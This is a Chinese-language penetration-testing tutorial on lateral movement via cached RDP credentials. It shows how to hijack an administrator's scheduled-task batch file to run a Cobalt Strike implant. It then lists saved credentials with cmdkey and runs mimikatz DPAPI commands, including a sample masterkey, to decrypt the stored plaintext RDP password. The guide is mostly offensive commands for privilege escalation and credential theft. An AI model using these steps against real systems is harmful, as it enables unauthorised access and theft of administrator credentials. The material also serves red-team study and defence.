内网横向之RDP缓存利用

RDP（远程桌面协议）在连接过程中会缓存凭据，尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息，或者是经过加密的身份验证令牌

所以我们想登录这个rdp缓存，就是先找到凭证，再通过mimikatz来解密凭证，获取明文

0x01 以administrator权限上线

WIN+R 输入taskschd.msc

打开任务计划程序

找到批处理文件(.bat) 是Administrator创建的，找到他的目录

写入cs马子

后在任务计划程序运行net.bat

就成功上线了

注意:不是说找到一个由administrator创建的.bat文件就行，而是说在计划任务中，这个由administrator创建的.bat可以以administrator的身份去运行。

0X02 找到RDP凭据

用administrator权限来执行下面的命令

cmdkey /list

发现存在凭证后

再用里面的文件浏览功能

之后找到下面的凭据

再次说明，这个凭据是因为administrator在RDP其他主机的时候，选择了记住我的凭证功能，然后在本地保留了一个凭证

0x03 获取guidMasterKey

privilege::debug
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B

0x04 获取MasterKey对应的

privilege::debug 
sekurlsa::dpapi

0x05 拿MasterKey进行解密

 mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B /masterkey:2af578e7d889e691901422cabdd559e42d0a03882073e7ca46abc03422547ec7108113dc8928326cc181c69b6eff2fa7d87a06254474f0a892f9c183d56aae55

找到明文密码 就可以登录，达到横向移动->RDP的渗透手法